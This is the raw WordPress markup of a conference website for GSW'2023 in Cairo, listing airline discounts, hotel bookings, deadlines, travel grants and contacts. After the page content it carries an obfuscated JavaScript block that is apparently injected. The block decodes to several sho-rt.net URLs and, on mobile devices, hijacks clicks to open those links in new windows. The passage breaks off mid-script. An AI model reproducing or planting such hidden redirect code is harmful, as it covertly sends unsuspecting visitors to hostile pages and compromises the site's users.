Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153474011{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153388835{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new 